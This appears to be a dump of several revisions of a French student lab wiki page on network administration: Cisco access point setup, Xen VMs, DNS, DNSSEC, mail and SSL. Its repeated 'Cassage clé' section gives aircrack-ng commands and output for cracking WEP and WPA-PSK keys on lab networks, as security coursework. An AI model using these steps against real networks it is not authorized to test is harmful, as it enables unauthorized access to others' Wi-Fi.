Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est nécessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===<br />
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. <br />
Nous utilisons pour commencer<br />
<pre>airmon-ng start wlan2 </pre><br />
Puis<br />
<pre>airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F</pre><br />
--encrypt permet de sélectionner le type d'encryption souhaité.<br />
<pre> CH 6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
30:5A:3A:15:F6:3F -34 100 738 1323 26 6 54e WPA2 CCMP PSK Poneyus <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
30:5A:3A:15:F6:3F 74:29:AF:F3:FD:91 -16 1e- 1 75 265 <br />
30:5A:3A:15:F6:3F 04:DB:56:3D:FD:A2 -40 0e- 0e 4709 1367 </pre><br />
<br />
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option <i>handshake</i><br />
<br />
et nous pouvons utiliser la commande<br />
<pre> aircrack-ng Poney.cap dico.txt</pre><br />
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt <br />
Et au bout d'une heure nous parvenons à retrouver la clé WPA .<br />
<br />
<pre> Aircrack-ng 1.2 beta3<br />
<br />
<br />
[01:01:16] 2857196 keys tested (792.44 k/s)<br />
<br />
<br />
KEY FOUND! [ 02857193 ]<br />
<br />
<br />
Master Key : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 <br />
D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 <br />
<br />
Transient Key : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 <br />
C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 <br />
21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 <br />
22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 <br />
<br />
EAPOL HMAC : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35662TP sysres IMA2a5 2016/2017 G42016-12-06T11:17:18Z<p>Jturut : </p>
<hr />
<div><TABLE BORDER="1"> <br />
<CAPTION> Récapitulatif des IP </CAPTION> <br />
<TR> <br />
<TH> N° VLAN </TH> <br />
<TH> Prénom </TH> <br />
<TH> Réseau local </TH> <br />
<TH> Nom VM </TH> <br />
<TH> @IP VM </TH><br />
</TR><br />
<TR> <br />
<TD> VLAN20 </TD> <br />
<TD> Dimitri </TD> <br />
<TD> 10.60.20.0/24 </TD> <br />
<TD> Vald </TD><br />
<TD> 193.48.57.182/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN21 </TD> <br />
<TD> Nabil </TD> <br />
<TD> 10.60.21.0/24 </TD> <br />
<TD> Pnl </TD><br />
<TD> 193.48.57.177/28 </TD> <br />
</TR><br />
<TR> <br />
<TD> VLAN22 </TD> <br />
<TD> Otmane </TD> <br />
<TD> 10.60.22.0/24 </TD> <br />
<TD> Lartiste </TD><br />
<TD> 193.48.57.178/28 </TD> <br />
</TR><br />
<TR> <br />
<TD> VLAN23 </TD> <br />
<TD> Hugo </TD> <br />
<TD> 10.60.23.0/24 </TD> <br />
<TD> Gradur </TD><br />
<TD> 193.48.57.179/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN24 </TD> <br />
<TD> Clement </TD> <br />
<TD> 10.60.24.0/24 </TD> <br />
<TD> Gringe </TD><br />
<TD> 193.48.57.180/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN25 </TD> <br />
<TD> Joan </TD> <br />
<TD> 10.60.25.0/24 </TD> <br />
<TD> Orelsan </TD><br />
<TD> 193.48.57.181/28 </TD> <br />
</TR> <br />
</TABLE> <br />
<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés<br />
<pre>dmesg | grep tty</pre><br />
<br />
Pour configurer notre Cisco, on utilise <i>minicom -os</i> et pour cela nous devons être en root<br />
<br />
Une fois minicom lancé, on vient changer les paramètre de notre Cisco<br />
<br />
<pre>A - Serial Device : /dev/ttyUSB0<br />
B - Lockfile Location : /var/lock <br />
C - Callin Program :<br />
D - Callout Program :<br />
E - Bps/Par/Bits : 9600 8N1<br />
F - Hardware Flow Control : No<br />
G - Software Flow Control : No<br />
</pre><br />
<br />
On se connecte en admin sur le Cisco <br />
<Pre>enable<br />
config terminal<br />
</pre><br />
<br />
Configuration du SSID<br />
<pre>dot11 ssid MAMENE<br />
authentication open<br />
guest-mode<br />
</pre><br />
<br />
Configuraiton de l'interface Dot11Radio0<br />
<pre><br />
interface Dot11Radio0<br />
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key<br />
encryption mode wep mandatory<br />
</pre><br />
<br />
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés<br />
<pre>access-list 701 permit 5cb9.0180.a039 0000.0000.0000<br />
access-list 701 permit 3ca8.2a7a.05c5 0000.0000.0000<br />
access-list 701 permit 7429.aff3.fd91 0000.0000.0000<br />
access-list 701 permit 5cb9.0180.a139 0000.0000.0000</pre><br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===<br />
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. <br />
Nous utilisons pour commencer<br />
<pre>airmon-ng start wlan2 </pre><br />
Puis<br />
<pre>airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F</pre><br />
--encrypt permet de sélectionner le type d'encryption souhaité.<br />
<pre> CH 6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
30:5A:3A:15:F6:3F -34 100 738 1323 26 6 54e WPA2 CCMP PSK Poneyus <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
30:5A:3A:15:F6:3F 74:29:AF:F3:FD:91 -16 1e- 1 75 265 <br />
30:5A:3A:15:F6:3F 04:DB:56:3D:FD:A2 -40 0e- 0e 4709 1367 </pre><br />
<br />
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option <i>handshake</i><br />
<br />
et nous pouvons utiliser la commande<br />
<pre> aircrack-ng Poney.cap dico.txt</pre><br />
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt <br />
Et au bout d'une heure nous parvenons à retrouver la clé WPA .<br />
<br />
<pre> Aircrack-ng 1.2 beta3<br />
<br />
<br />
[01:01:16] 2857196 keys tested (792.44 k/s)<br />
<br />
<br />
KEY FOUND! [ 02857193 ]<br />
<br />
<br />
Master Key : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 <br />
D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 <br />
<br />
Transient Key : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 <br />
C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 <br />
21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 <br />
22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 <br />
<br />
EAPOL HMAC : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35661TP sysres IMA2a5 2016/2017 G42016-12-06T11:14:42Z<p>Jturut : </p>
<hr />
<div>{|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
<br />
<TABLE BORDER="1"> <br />
<CAPTION> Récapitulatif des IP </CAPTION> <br />
<TR> <br />
<TH> N° VLAN </TH> <br />
<TH> Prénom </TH> <br />
<TH> Réseau local </TH> <br />
<TH> Nom VM </TH> <br />
<TH> @IP VM </TH><br />
</TR><br />
<TR> <br />
<TD> VLAN20 </TD> <br />
<TD> Dimitri </TD> <br />
<TD> 10.60.20.0/24 </TD> <br />
<TD> Vald </TD><br />
<TD> 193.48.57.182/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN21 </TD> <br />
<TD> Nabil </TD> <br />
<TD> 10.60.21.0/24 </TD> <br />
<TD> Pnl </TD><br />
<TD> 193.48.57.177/28 </TD> <br />
</TR><br />
<TR> <br />
<TD> VLAN22 </TD> <br />
<TD> Otmane </TD> <br />
<TD> 10.60.22.0/24 </TD> <br />
<TD> Lartiste </TD><br />
<TD> 193.48.57.178/28 </TD> <br />
</TR><br />
<TR> <br />
<TD> VLAN23 </TD> <br />
<TD> Hugo </TD> <br />
<TD> 10.60.23.0/24 </TD> <br />
<TD> Gradur </TD><br />
<TD> 193.48.57.179/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN24 </TD> <br />
<TD> Clement </TD> <br />
<TD> 10.60.24.0/24 </TD> <br />
<TD> Gringe </TD><br />
<TD> 193.48.57.180/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN25 </TD> <br />
<TD> Joan </TD> <br />
<TD> 10.60.25.0/24 </TD> <br />
<TD> Orelsan </TD><br />
<TD> 193.48.57.181/28 </TD> <br />
</TR> <br />
</TABLE> <br />
<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés<br />
<pre>dmesg | grep tty</pre><br />
<br />
Pour configurer notre Cisco, on utilise <i>minicom -os</i> et pour cela nous devons être en root<br />
<br />
Une fois minicom lancé, on vient changer les paramètre de notre Cisco<br />
<br />
<pre>A - Serial Device : /dev/ttyUSB0<br />
B - Lockfile Location : /var/lock <br />
C - Callin Program :<br />
D - Callout Program :<br />
E - Bps/Par/Bits : 9600 8N1<br />
F - Hardware Flow Control : No<br />
G - Software Flow Control : No<br />
</pre><br />
<br />
On se connecte en admin sur le Cisco <br />
<Pre>enable<br />
config terminal<br />
</pre><br />
<br />
Configuration du SSID<br />
<pre>dot11 ssid MAMENE<br />
authentication open<br />
guest-mode<br />
</pre><br />
